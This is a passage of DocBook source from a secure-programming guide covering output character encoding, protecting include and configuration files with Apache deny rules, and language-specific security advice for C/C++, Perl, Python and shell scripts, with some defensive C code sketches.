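    saved = malloc(strlen(current) + 1);     /* later calls may reuse
                                                the returned storage */
    if (saved == NULL)
        return -1;
    strcpy(saved, current);

    if (setlocale(LC_NUMERIC, "C") == NULL) {
        free(saved);
        return -1;
    }
    n = snprintf(buf, size, "%.17g", value);
    setlocale(LC_NUMERIC, saved);            /* restore user's locale;
                                                result not checked in
                                                this sketch */
    free(saved);
    return (n < 0 || (size_t)n >= size) ? -1 : 0;
}
```
]]>
</programlisting>
The matching load routine would need to parse with the same fixed
convention, so that files written under one locale can be read under
another.
</para>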
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="output-character-encoding">
|
||
<title>Control Character Encoding in Output</title>
|
||
|
||
<para>
|
||
In general, a secure program must ensure that it synchronizes its
|
||
clients to any assumptions made by the secure program.
|
||
One issue often impacting web applications is that they forget to
|
||
specify the character encoding of their output.
|
||
This isn't a problem if all data is from trusted sources, but if
|
||
some of the data is from untrusted sources, the untrusted source may
|
||
sneak in data that uses a different encoding than the one expected
|
||
by the secure program.
|
||
This opens the door for a cross-site malicious content attack; see
|
||
<xref linkend="input-protection-cross-site"> for more information.
|
||
</para>
|
||
|
||
<para>
|
||
<ulink url="http://www.cert.org/tech_tips/malicious_code_mitigation.html">CERT's tech tip on malicious code mitigation</ulink> explains the problem
|
||
of unspecified character encoding fairly well, so I quote it here:
|
||
|
||
<blockquote>
|
||
<para>
|
||
Many web pages leave the character encoding
|
||
("charset" parameter in HTTP) undefined.
|
||
In earlier versions of HTML and HTTP, the character encoding
|
||
was supposed to default to ISO-8859-1 if it wasn't defined.
|
||
In fact, many browsers had a different default, so it was not possible
|
||
to rely on the default being ISO-8859-1.
|
||
HTML version 4 legitimizes this - if the character encoding isn't specified,
|
||
any character encoding can be used.
|
||
</para>
|
||
|
||
<para>
|
||
If the web server doesn't specify which character encoding is in use,
|
||
it can't tell which characters are special.
|
||
Web pages with unspecified character encoding work most of the time
|
||
because most character sets assign the same characters to byte values
|
||
below 128.
|
||
But which of the values above 128 are special?
|
||
Some 16-bit character-encoding schemes have additional
|
||
multi-byte representations for special characters such as "<".
|
||
Some browsers recognize this alternative encoding and act on it.
|
||
This is "correct" behavior, but it makes attacks using malicious scripts
|
||
much harder to prevent.
|
||
The server simply doesn't know which byte sequences
|
||
represent the special characters.
|
||
</para>
|
||
|
||
<para>
|
||
For example, UTF-7 provides alternative encoding for "<" and ">",
|
||
and several popular browsers recognize these as the start and end of a tag.
|
||
This is not a bug in those browsers.
|
||
If the character encoding really is UTF-7, then this is correct behavior.
|
||
The problem is that it is possible to get into a situation in which
|
||
the browser and the server disagree on the encoding.
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
<para>
|
||
Thankfully, though explaining the issue is tricky, its resolution in HTML
|
||
is easy.
|
||
In the HTML header, simply specify the charset, like this example
|
||
from CERT:
|
||
<programlisting>
<![CDATA[
 <HTML>
 <HEAD>
 <META http-equiv="Content-Type"
 content="text/html; charset=ISO-8859-1">
 <TITLE>HTML SAMPLE</TITLE>
 </HEAD>
 <BODY>
 <P>This is a sample HTML page
 </BODY>
 </HTML>
]]>
</programlisting>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
From a technical standpoint,
|
||
an even better approach is to set the character encoding as part of
|
||
the HTTP protocol output, though some libraries make this more difficult.
|
||
This is technically better because it doesn't force the client to
|
||
examine the header to determine a character encoding that would enable it
|
||
to read the META information in the header.
|
||
Of course, in practice a browser that couldn't read the META information
|
||
given above and use it correctly would not succeed in the marketplace,
|
||
but that's a different issue.
|
||
In any case, this just means that the server would need to send,
as part of its HTTP response headers, a ``charset'' parameter
(on the Content-Type header) with the desired value.
|
||
Unfortunately, it's hard to heartily recommend this (technically better)
|
||
approach, because some older HTTP/1.0 clients did not deal properly with
|
||
an explicit charset parameter.
|
||
<!-- This is documented in the HTTP 1.1 specification -->
|
||
Although the HTTP/1.1 specification requires clients to obey the parameter,
|
||
it's suspicious enough that you probably ought to use it as an
|
||
adjunct to forcing the use of the correct
|
||
character encoding, and not your sole mechanism.
|
||
</para>
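<para>
For a program that emits its own HTTP headers (I am assuming a
CGI-style program here), setting the charset at the protocol level
might look like the following sketch.
The helper name content_type_header() is hypothetical, and the set of
characters it accepts in a charset name is deliberately stricter than
what HTTP itself allows:
<programlisting>
<![CDATA[
```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: build the Content-Type header line with an
   explicit charset parameter.  The charset name is restricted to a
   conservative set of characters so it cannot carry CR/LF or other
   header syntax.  Returns 0 on success, -1 on a rejected name or if
   buf is too small. */
int content_type_header(char *buf, size_t size, const char *charset)
{
    static const char allowed[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "abcdefghijklmnopqrstuvwxyz"
        "0123456789-_";
    size_t len;
    int n;

    assert(buf != NULL && size > 0 && charset != NULL);
    len = strlen(charset);
    if (len == 0 || strspn(charset, allowed) != len)
        return -1;                   /* empty or suspicious name */
    n = snprintf(buf, size,
                 "Content-Type: text/html; charset=%s\r\n", charset);
    return (n < 0 || (size_t)n >= size) ? -1 : 0;
}
```
]]>
</programlisting>
The program would write this line with its other headers, followed by
the blank line that ends the header section, and should still include
the META declaration in the HTML itself as discussed above.
</para>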
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="prevent-include-access">
|
||
<title>Prevent Include/Configuration File Access</title>
|
||
<!-- I was reminded of this by the Bugtraq posting of 1 Dec 2000
|
||
by Mads Bach (bach@INDER.NET), "Subject: Web based apps and include files" -->
|
||
|
||
<para>
|
||
When developing web based applications,
|
||
do not allow users to access (read) files such as the program include and
|
||
configuration files.
|
||
This data may provide enough information (e.g., passwords) to break into
|
||
the system.
|
||
Note that this guideline sometimes also applies to other kinds of applications.
|
||
There are several actions you can take to do this, including:
|
||
<itemizedlist>
|
||
<listitem><para>Place
|
||
the include/configuration files outside of the web document
|
||
root (so that the web server will never serve the files).
|
||
Really, this is the best approach unless there's some reason the
|
||
files have to be inside the document root.</para></listitem>
|
||
<listitem><para>Configure the web server so it will not serve include files as
|
||
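text. For example, if you're using Apache,
you can deny all access to .inc files like so
(this is the Order/Deny syntax of Apache 2.2 and earlier; Apache 2.4 and
later express the same rule as ``Require all denied''):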
|
||
<programlisting width="61">
|
||
<![CDATA[
|
||
<Files *.inc>
|
||
Order allow,deny
|
||
Deny from all
|
||
</Files>
|
||
]]>
|
||
</programlisting>
|
||
</para></listitem>
|
||
<listitem><para>Place the include files
|
||
in a protected directory (using .htaccess), and designate them as files
|
||
that won't be served.
|
||
<!-- Suggested by Dustin Rue in Bugtraq 1 Dec 2000 to 4 Dec 2000 -->
|
||
</para></listitem>
|
||
<listitem><para>Use a filter to deny access to the files.
|
||
For Apache, this can be done using:
|
||
<programlisting width="61">
|
||
<![CDATA[
|
||
<Files ~ "\.phpincludes">
|
||
Order allow,deny
|
||
Deny from all
|
||
</Files>
|
||
]]>
|
||
</programlisting>
|
||
If you need full regular expressions to match filenames, in Apache you
|
||
could use the FilesMatch directive.
|
||
<!-- Suggested by Julien Savoie and James Lyon
|
||
in Bugtraq 1 Dec 2000 to 4 Dec 2000 -->
|
||
</para></listitem>
|
||
<listitem><para>If your include file is a valid script file,
|
||
which your server will parse,
|
||
make sure that it doesn't act on user-supplied parameters and that it's
|
||
designed to be secure.</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
These approaches won't protect you from users who
|
||
have access to the directories your files are in if they are world-readable.
|
||
You could change the permissions of the files so
|
||
that only the uid/gid of the webserver can read these files.
|
||
However, this approach won't work if the user can get the web server to
|
||
run his own scripts (the user can just write scripts to access your files).
|
||
Fundamentally, if your site is being hosted on a server shared with
|
||
untrusted people, it's harder to secure the system.
|
||
One approach is to run multiple web serving programs, each with different
|
||
permissions; this provides more security but is painful in practice.
|
||
Another approach is to set these files to be read only by your uid/gid,
|
||
and have the server run scripts at ``your'' permission.
|
||
This latter approach has its own problems: it means that certain parts of
|
||
the server must have root privileges, and that the script may
|
||
have more permissions than necessary.
|
||
</para>
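<para>
A program can also defend itself by refusing to use a configuration
file whose permissions are too loose.
The following sketch assumes a POSIX system; open_private_config() is
a hypothetical name, and the policy it enforces (a regular file with
no permissions at all for ``other'') is only one reasonable choice:
<programlisting>
<![CDATA[
```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: open a configuration file read-only, but only
   if it is a regular file that grants no permissions to "other".
   The check uses fstat() on the open descriptor, so the file cannot
   be swapped between the check and the open.
   Returns a file descriptor, or -1 if the file is refused. */
int open_private_config(const char *path)
{
    struct stat st;
    int fd;

    assert(path != NULL);
    fd = open(path, O_RDONLY | O_NOFOLLOW);  /* do not follow a final
                                                symbolic link */
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        (st.st_mode & S_IRWXO) != 0) {
        close(fd);
        return -1;                   /* unreadable, odd, or too open */
    }
    return fd;
}
```
]]>
</programlisting>
This does not replace the server configuration steps above; it simply
makes an accidental world-readable password file fail loudly instead
of quietly working.
</para>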
|
||
</sect1>
|
||
|
||
|
||
|
||
</chapter>
|
||
|
||
<chapter id="language-specific">
|
||
<title>Language-Specific Issues</title>
|
||
<epigraph>
|
||
<attribution>1 Corinthians 14:10 (NIV)</attribution>
|
||
<para>
|
||
Undoubtedly there are all sorts of languages in the world,
|
||
yet none of them is without meaning.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
There are many language-specific security issues.
|
||
Many of them can be summarized as follows:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Turn on all relevant warnings and protection mechanisms available to you
|
||
where practical.
|
||
For compiled languages, this includes
|
||
both compile-time mechanisms and run-time mechanisms.
|
||
In general, security-relevant programs should compile cleanly with
|
||
all warnings turned on.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
If you can use a ``safe mode'' (e.g., a mode that limits the activities
|
||
of the executable), do so.
|
||
Many interpreted languages include such a mode.
|
||
In general, don't depend on the safe mode to provide absolute protection;
|
||
most languages' safe modes have not been sufficiently analyzed for their
|
||
security, and when they are, people usually discover many ways to exploit them.
|
||
However, by writing your code so that it's secure out of safe mode, and
|
||
then adding the safe mode, you end up with defense-in-depth (since in
|
||
many cases, an attacker has to break both
|
||
your application code and the safe mode).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Avoid dangerous and deprecated operations in the language.
|
||
By ``dangerous'', I mean operations which are difficult to use correctly.
|
||
For example, many languages include
|
||
some mechanisms or functions that are ``magical'', that
|
||
is, they try to infer the ``right'' thing to do using a heuristic -
|
||
generally you should avoid them, because an attacker may be able to
|
||
exploit the heuristic and do something dangerous instead of what was intended.
|
||
A common error is an ``off-by-one'' error, in which the bound is
|
||
off by one, and sometimes these result in exploitable errors.
|
||
In general, write code in a way that minimizes the likelihood of
|
||
off-by-one errors.
|
||
If there are standard conventions in the language (e.g., for writing loops),
|
||
use them.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Ensure that the language's
|
||
infrastructure (e.g., run-time library) is available and secured.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
When using a language that automatically garbage-collects strings, be
|
||
especially careful to immediately erase secret data
|
||
(in particular secret keys and passwords).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Know precisely the semantics of the operations that you are using.
|
||
Look up each operation's semantics in its documentation.
|
||
Do not ignore return values unless you're sure they cannot be relevant.
|
||
Don't ignore the difference between ``signed'' and ``unsigned'' values.
|
||
This is particularly difficult in languages which don't support exceptions,
|
||
like C, but that's the way it goes.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<sect1 id="c-cpp">
|
||
<title>C/C++</title>
|
||
|
||
<para>
|
||
It is possible to develop secure code using C or C++, but both
|
||
languages include fundamental design decisions that make it
|
||
more difficult to write secure code.
|
||
C and C++ easily permit buffer overflows, force programmers to do their
|
||
own memory management, and are fairly lax in their typing systems.
|
||
For systems programs (such as an operating system kernel),
|
||
C and C++ are fine choices.
|
||
For applications, C and C++ are often over-used.
|
||
Strongly consider using an even higher-level language,
|
||
at least for the majority of the application.
|
||
But clearly, there are many existing programs in C and C++
|
||
which won't get completely rewritten, and many developers may choose
|
||
to develop in C and C++.
|
||
</para>
|
||
|
||
<para>
|
||
One of the biggest security problems with C and C++ programs is
|
||
buffer overflow; see <xref linkend="buffer-overflow">
|
||
for more information.
|
||
C has the additional weakness of not supporting exceptions, which makes
|
||
it easy to write programs that ignore critical error situations.
|
||
</para>
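<para>
As a small illustration of checking return values in C, here is a sketch
(the function name read_first_line is my own, chosen purely for illustration)
in which the failure of any library call is reported as a failure of the
whole operation rather than being silently ignored:
</para>

```c
#include <assert.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Copy the first line of the file at `path` into buf (at most size-1 bytes).
 * Returns 0 on success and -1 on any failure; every library call is checked. */
int read_first_line(const char *path, char *buf, size_t size)
{
    FILE *fp;
    int status = 0;

    assert(path != NULL && buf != NULL && size > 0);
    if (size > INT_MAX)
        size = INT_MAX;             /* fgets() takes an int length */

    fp = fopen(path, "r");
    if (fp == NULL) {
        fprintf(stderr, "cannot open %s: %s\n", path, strerror(errno));
        return -1;
    }
    if (fgets(buf, (int)size, fp) == NULL) {
        /* Read error or empty file; both count as failure here. */
        buf[0] = '\0';
        status = -1;
    }
    if (fclose(fp) != 0)
        status = -1;
    return status;
}
```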
|
||
|
||
<para>
|
||
Another problem with C and C++ is that developers have to do their
|
||
own memory management (e.g., using malloc(), calloc(), free(), new, and delete),
|
||
and failing to do it correctly may result in a security flaw.
|
||
The more serious problem is that programs may erroneously
|
||
free memory that should not be freed (e.g., because it's already been freed).
|
||
This can result in an immediate crash or be exploitable, allowing
|
||
an attacker to cause arbitrary code to be executed; see
|
||
[Anonymous Phrack 2001].
|
||
Some systems (such as many GNU/Linux systems) don't protect
|
||
against double-freeing at all by default, and it is not clear that those
|
||
systems which attempt to protect themselves are truly unsubvertable.
|
||
Although I haven't seen anything written on the subject, I suspect that
|
||
using the incorrect call in C++ (e.g., mixing new and malloc()) could
|
||
have similar effects.
|
||
For example, on March 11, 2002, it was announced that the zlib
|
||
library had a double-free flaw, affecting the many programs that use it.
|
||
<!-- http://www.linuxsecurity.com/articles/security_sources_article-4582.html -->
|
||
Thus, when testing programs on GNU/Linux,
|
||
you should set the environment variable
|
||
MALLOC_CHECK_ to 1 or 2, and you might consider executing your program
|
||
with that environment variable set to each of 0, 1, and 2.
|
||
The reason for this variable is explained in the GNU/Linux malloc(3) man page:
|
||
<blockquote>
|
||
<para>
|
||
Recent versions of Linux libc (later than 5.4.23) and
|
||
GNU libc (2.x) include a malloc implementation which is tunable
|
||
via environment variables.
|
||
When MALLOC_CHECK_ is set, a special (less efficient) implementation
|
||
is used which is designed to be tolerant against simple errors,
|
||
such as double calls of free() with the same argument,
|
||
or overruns of a single byte (off-by-one bugs).
|
||
Not all such errors can be protected against, however, and memory leaks
|
||
can result.
|
||
If MALLOC_CHECK_ is set to 0, any detected heap corruption
|
||
is silently ignored;
|
||
if set to 1, a diagnostic is printed on stderr;
|
||
if set to 2, abort() is called immediately.
|
||
This can be useful because otherwise a crash may happen much later,
|
||
and the true cause for the problem is then very hard to track down.
|
||
</para>
|
||
</blockquote>
|
||
There are various tools to deal with this, such as
|
||
Electric Fence and Valgrind;
|
||
see <xref linkend="tools"> for more information.
|
||
If unused memory is not freed (e.g., using free()), that unused memory
|
||
may accumulate - and if enough unused memory can accumulate, the
|
||
program may stop working.
|
||
As a result, attackers may be able to exploit such memory leaks to
|
||
create a denial of service.
|
||
It's theoretically possible for attackers to cause memory to be
|
||
fragmented and cause a denial of service, but usually this
|
||
is a fairly impractical and low-risk attack.
|
||
</para>
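<para>
One common defensive habit against double-freeing is to reset a pointer to
NULL as soon as it is freed, since free(NULL) is defined to do nothing.
The sketch below assumes a macro name of my own invention (FREE_AND_CLEAR);
note that it only helps when every release goes through the same pointer
variable, so it is no substitute for testing with MALLOC_CHECK_ or a
memory-checking tool:
</para>

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Free the object `p` points to and reset `p` itself, so that releasing
 * it a second time through the same variable is a harmless free(NULL). */
#define FREE_AND_CLEAR(p) do { free(p); (p) = NULL; } while (0)

/* Demonstration: returns 1 if the buffer was released and the pointer
 * cleared, or 0 if the allocation failed. */
int demo_release_twice(void)
{
    char *buffer = malloc(32);

    if (buffer == NULL)
        return 0;
    strcpy(buffer, "example");

    FREE_AND_CLEAR(buffer);
    assert(buffer == NULL);
    FREE_AND_CLEAR(buffer);   /* would be a double free without the reset */
    return buffer == NULL;
}
```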
|
||
|
||
<para>
|
||
Be as strict as you reasonably can when you declare types.
|
||
Where you can, use ``enum'' to define enumerated values (and not
|
||
just a ``char'' or ``int'' with special values).
|
||
This is particularly useful for values in switch statements, where
|
||
the compiler can be used to determine if all legal values have been covered.
|
||
Where it's appropriate, use ``unsigned'' types if the value can't be
|
||
negative.
|
||
</para>
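<para>
For instance, the following sketch (with type and function names that are
only illustrative) uses an enum in a switch statement that deliberately has
no ``default'' label.
With gcc, -Wall enables a warning when an enumerator is not handled, so
adding a new access level later without updating the switch gets flagged:
</para>

```c
#include <assert.h>
#include <stddef.h>

enum access_level { ACCESS_NONE, ACCESS_READ, ACCESS_WRITE };

/* No `default:` label on purpose, so the compiler can warn about any
 * enumerator that is not handled below. */
const char *access_level_name(enum access_level level)
{
    switch (level) {
    case ACCESS_NONE:  return "none";
    case ACCESS_READ:  return "read";
    case ACCESS_WRITE: return "write";
    }
    /* Reached only if `level` holds a value outside the enumeration. */
    return NULL;
}

/* Returns 1 only for the level that grants write access. */
int access_permits_write(enum access_level level)
{
    /* In debug builds, catch values that are not valid enumerators. */
    assert(access_level_name(level) != NULL);
    return level == ACCESS_WRITE;
}
```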
|
||
|
||
<para>
|
||
<!-- The example is from Sebastian (Bugtraq, 26 June 2000) -->
|
||
One complication in C and C++ is that the character type ``char'' can be
|
||
signed or unsigned (depending on the compiler and machine).
|
||
When a signed char with its high bit set
|
||
is saved in an integer, the result will be a negative number;
|
||
in some cases this can be exploitable.
|
||
In general, use ``unsigned char'' instead of char or signed char for
|
||
buffers, pointers, and casts when
|
||
dealing with character data that may have values greater than 127 (0x7f).
|
||
</para>
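<para>
A typical place where this matters is using a character as an array index.
The following sketch (count_bytes is an illustrative name, not a library
function) converts each character through ``unsigned char'' before indexing:
</para>

```c
#include <assert.h>
#include <stddef.h>

/* Count how often each byte value occurs in the NUL-terminated string `s`.
 * `counts` must have room for 256 entries. */
void count_bytes(const char *s, unsigned int counts[256])
{
    size_t i;

    assert(s != NULL && counts != NULL);
    for (i = 0; i < 256; i++)
        counts[i] = 0;
    for (i = 0; s[i] != '\0'; i++) {
        /* Convert through unsigned char first.  Where plain char is signed,
         * using s[i] directly would turn bytes above 0x7f into negative
         * indexes and write before the start of the array. */
        unsigned char byte = (unsigned char)s[i];
        counts[byte]++;
    }
}
```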
|
||
|
||
<para>
|
||
C and C++ are by definition rather lax in their type-checking support, but
|
||
you can at least increase their level of checking so that some mistakes
|
||
can be detected automatically.
|
||
Turn on as many compiler warnings as you can and change the code to cleanly
|
||
compile with them, and strictly use ANSI prototypes in separate header
|
||
(.h) files to ensure that all function calls use the correct types.
|
||
For C or C++ compilations using gcc, use at least
|
||
the following as compilation flags (which turn on a host of warning messages)
|
||
and try to eliminate all warnings (note that -O2 is used since some
|
||
warnings can only be detected by the data flow analysis performed at
|
||
higher optimization levels):
|
||
<screen width="61">
|
||
gcc -Wall -Wpointer-arith -Wstrict-prototypes -O2
|
||
</screen>
|
||
You might want ``-W -pedantic'' too.
|
||
</para>
|
||
|
||
<para>
|
||
Many C/C++ compilers can detect inaccurate format strings.
|
||
For example,
|
||
gcc can warn about inaccurate format strings for functions you create
|
||
if you use its __attribute__() facility (a C extension) to mark such functions,
|
||
and you can use that facility without making your code non-portable.
|
||
Here is an example of what you'd put in your header (.h) file:
|
||
<programlisting width="61">
|
||
/* in header.h */
|
||
#ifndef __GNUC__
|
||
# define __attribute__(x) /*nothing*/
|
||
#endif
|
||
|
||
extern void logprintf(const char *format, ...)
|
||
__attribute__((format(printf,1,2)));
|
||
extern void logprintva(const char *format, va_list args)
|
||
__attribute__((format(printf,1,0)));
|
||
</programlisting>
|
||
The "format" attribute takes either "printf" or "scanf", and the numbers
|
||
that follow are the parameter number of the format string and the first
|
||
variadic parameter (respectively). The GCC documentation describes this facility well.
|
||
Note that there are other __attribute__ facilities as well,
|
||
such as "noreturn" and "const".
|
||
<!-- The __attribute__ discussion
|
||
Derived from "Stephen J. Friedl", Sat, 22 Jul 2000 16:21:08 -0700,
|
||
Bugtraq -->
|
||
</para>
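<para>
To make the declarations above concrete, here is one way the two functions
might be defined.
This is only a sketch: the log_stream variable and the decision to append
a newline are my assumptions, not part of any standard logging interface.
</para>

```c
#include <assert.h>
#include <stdarg.h>
#include <stdio.h>

#ifndef __GNUC__
#  define __attribute__(x) /*nothing*/
#endif

void logprintf(const char *format, ...)
    __attribute__((format(printf, 1, 2)));
void logprintva(const char *format, va_list args)
    __attribute__((format(printf, 1, 0)));

/* Hypothetical destination for log output; NULL means stderr. */
static FILE *log_stream = NULL;

/* Write one formatted log line from an already-started va_list. */
void logprintva(const char *format, va_list args)
{
    FILE *out = (log_stream != NULL) ? log_stream : stderr;

    assert(format != NULL);
    /* A failure to write a log line is deliberately not treated as fatal. */
    (void)vfprintf(out, format, args);
    (void)fputc('\n', out);
}

/* Variadic front end; the compiler checks callers' format strings. */
void logprintf(const char *format, ...)
{
    va_list args;

    va_start(args, format);
    logprintva(format, args);
    va_end(args);
}
```

<para>
With these declarations in scope, a mismatched call such as
logprintf("%s", 5) should draw a format warning from gcc when compiled
with -Wall.
</para>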
|
||
|
||
<para>
|
||
Avoid common errors made by C/C++ developers.
|
||
For example, be careful not to use ``='' when you mean ``==''.
|
||
</para>
|
||
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="perl">
|
||
<title>Perl</title>
|
||
<para>
|
||
Perl programmers should first read the man page perlsec(1),
|
||
which describes a number of issues involved with writing secure programs
|
||
in Perl.
|
||
In particular, perlsec(1) describes the ``taint'' mode, which most
|
||
secure Perl programs should use.
|
||
Taint mode is automatically enabled if the real and effective user or group
|
||
IDs differ, or you can use the -T command line flag
|
||
(use the latter if you're running on behalf of someone else, e.g.,
|
||
a CGI script).
|
||
Taint mode turns on various checks, such as checking
|
||
path directories to make sure they aren't writable by others.
|
||
</para>
|
||
|
||
<para>
|
||
The most obvious effect of taint mode, however, is that
|
||
you may not use data derived from outside your program to
|
||
affect something else outside your program by accident.
|
||
In taint mode,
|
||
all externally-obtained input is marked as ``tainted'', including
|
||
command line arguments, environment variables,
|
||
locale information (see perllocale(1)),
|
||
results of certain system calls (readdir, readlink,
|
||
the gecos field of getpw* calls), and all file input.
|
||
Tainted data may not be
|
||
used directly or indirectly in any command that invokes a
|
||
sub-shell, nor in any command that modifies files,
|
||
directories, or processes.
|
||
There is one important exception: If you
|
||
pass a list of arguments to either system or exec, the
|
||
elements of that list are NOT checked for taintedness, so
|
||
be especially careful with system or exec while in taint mode.
|
||
</para>
|
||
|
||
<para>
|
||
Any data value derived from tainted data becomes tainted also.
|
||
There is one exception to this; the way to untaint data is to
|
||
extract a substring of the tainted data.
|
||
Don't just use ``.*'' blindly as your substring, though, since this
|
||
would defeat the tainting mechanism's protections.
|
||
Instead, write patterns that match only the ``safe'' input
|
||
allowed by your program, and use them to extract ``good'' values.
|
||
After extracting the value, you may still need to check it
|
||
(in particular for its length).
|
||
</para>
|
||
|
||
<para>
|
||
The open, glob, and backtick functions
|
||
call the shell to expand filename wild card characters; this
|
||
can be used to open security holes.
|
||
You can try to avoid these functions entirely, or use them in a
|
||
less-privileged ``sandbox'' as described in perlsec(1).
|
||
In particular, backticks should be rewritten using the system() call
|
||
(or even better, changed entirely to something safer).
|
||
</para>
|
||
|
||
<para>
|
||
The Perl open() function comes with, frankly,
|
||
``way too much magic'' for most secure programs; it interprets text
|
||
that, if not carefully filtered, can create lots of security problems.
|
||
Before writing code to open or lock a file, consult the perlopentut(1)
|
||
man page.
|
||
In most cases, sysopen() provides a safer (though more convoluted)
|
||
approach to opening a file.
|
||
<ulink
|
||
url="http://www.xray.mpe.mpg.de/mailing-lists/perl5-porters/2000-03/msg02596.html">
|
||
The new Perl 5.6 adds an open() call
|
||
with 3 parameters to turn off the magic behavior
|
||
without requiring the convolutions of sysopen()</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Perl programs should turn on the warning flag (-w), which warns of
|
||
potentially dangerous or obsolete statements.
|
||
</para>
|
||
|
||
<para>
|
||
You can also run Perl programs in a restricted environment.
|
||
For more information see the ``Safe'' module in the standard Perl
|
||
distribution.
|
||
I'm uncertain of the amount of auditing that this has undergone,
|
||
so beware of depending on this for security.
|
||
You might also investigate the ``Penguin Model for
|
||
Secure Distributed Internet Scripting'', though at the time
|
||
of this writing the code and documentation seem to be unavailable.
|
||
<!-- Search for Penguin FAQ, the Penguin Model for Secure Distributed
|
||
Internet Scripting -->
|
||
</para>
|
||
|
||
<para>
|
||
Many installations include a setuid root version of perl named ``suidperl''.
|
||
However, the perldelta man page version 5.6.1 recommends using sudo
|
||
instead, stating the following:
|
||
<blockquote>
|
||
<para>
|
||
"Note that suidperl is neither built nor installed by default in
|
||
any recent version of perl.
|
||
Use of suidperl is highly discouraged.
|
||
If you think you need it, try alternatives such as sudo first.
|
||
See http://www.courtesan.com/sudo/".
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="python">
|
||
<title>Python</title>
|
||
<para>
|
||
As with any language,
|
||
beware of any functions which allow data to be executed as parts of
|
||
a program, to make sure an untrusted user can't affect their input.
|
||
This includes exec(), eval(), and execfile()
|
||
(and frankly, you should check carefully any call to compile()).
|
||
The input() function is also surprisingly dangerous
|
||
[Watters 1996, 150].
|
||
</para>
|
||
|
||
<para>
|
||
Python programs with privileges that can be invoked by unprivileged users
|
||
(e.g., setuid/setgid programs)
|
||
must <emphasis>not</emphasis> import the ``user'' module.
|
||
The user module causes the pythonrc.py file to be read and executed.
|
||
Since this file would be under the control of an untrusted user,
|
||
importing the user module allows an attacker to force the trusted
|
||
program to run arbitrary code.
|
||
</para>
|
||
|
||
<para>
|
||
Python does very little compile-time checking -- it has essentially
|
||
no compile-time type information, and it doesn't even check that the
|
||
number of parameters passed is legal for a given function or method.
|
||
This is unfortunate, resulting in a lot of latent bugs
|
||
(both John Viega and I have experienced this problem).
|
||
Hopefully someday Python will implement optional static typing and
|
||
type-checking, an idea that's been discussed for some time.
|
||
A partial solution for now is PyChecker, a lint-like program that
|
||
checks for common bugs in Python source code.
|
||
You can get PyChecker from
|
||
<ulink url="http://pychecker.sourceforge.net">http://pychecker.sourceforge.net</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Python includes support for ``Restricted Execution'' through
|
||
its RExec class.
|
||
This is primarily intended for executing applets and mobile code, but
|
||
it can also be used to limit privilege in a program even when the
|
||
code has not been provided externally.
|
||
By default, a restricted execution
|
||
environment permits reading (but not writing) of files,
|
||
and does not include operations for network access or GUI interaction.
|
||
These defaults can be changed, but beware of creating loopholes in
|
||
the restricted environment.
|
||
In particular, allowing a user to unrestrictedly add attributes to a
|
||
class permits all sorts of ways to subvert the environment
|
||
because Python's implementation calls many ``hidden'' methods.
|
||
Note that, by default, most Python objects are passed by reference; if you
|
||
insert a reference to a mutable value into a restricted program's environment,
|
||
the restricted program can change the object in a way that's visible
|
||
outside the restricted environment!
|
||
Thus, if you want to give access to a mutable value, in many cases
|
||
you should copy the mutable value or use the Bastion module (which supports
|
||
restricted access to another object).
|
||
For more information, see
|
||
Kuchling [2000].
|
||
I'm uncertain of the amount of auditing that the restricted
|
||
execution capability has undergone, so programmer beware.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="shell">
|
||
<title>Shell Scripting Languages (sh and csh Derivatives)</title>
|
||
<para>
|
||
I strongly recommend against using
|
||
standard command shell scripting languages (such as csh, sh, and bash)
|
||
for setuid/setgid secure code.
|
||
Some systems (such as Linux) completely disable setuid/setgid
|
||
shell scripts, so creating setuid/setgid shell scripts creates
|
||
an unnecessary portability problem.
|
||
On some old systems they are fundamentally insecure due to a race condition
|
||
(as discussed in <xref linkend="process-creation">).
|
||
Even for other systems, they're not really a good idea.
|
||
</para>
|
||
|
||
<para>
|
||
In fact, there are a vast number of circumstances where shell scripting
|
||
languages shouldn't be used at all for secure programs.
|
||
Standard command shells are notorious for being affected by nonobvious inputs -
|
||
generally because command shells were designed to try to do
|
||
things ``automatically'' for an interactive user, not to defend against
|
||
a determined attacker.
|
||
Shell programs are fine for programs that don't need to be secure
|
||
(e.g., they run at the same privilege as the unprivileged
|
||
user and don't accept ``untrusted'' data).
|
||
They can also be useful when they're running with privilege, as long as
|
||
all the input (e.g., files, directories, command line, environment, etc.)
|
||
comes from trusted users - which is why they're
|
||
often used quite successfully in startup/shutdown scripts.
|
||
</para>
|
||
|
||
<para>
|
||
Writing secure shell programs in the presence of malicious
|
||
input is harder than in many other languages because
|
||
of all the things that shells are affected by.
|
||
For example,
|
||
``hidden'' environment variables (e.g., the ENV, BASH_ENV, and IFS values)
|
||
can affect how they operate or even execute arbitrary user-defined
|
||
code before the script can even execute.
|
||
Even things like filenames of the executable or directory contents can
|
||
affect execution.
|
||
If an attacker can create filenames containing
|
||
some control characters (e.g., newline),
|
||
or whitespace, or shell metacharacters, or begin with a dash
|
||
(the option flag syntax), there are often ways to exploit them.
|
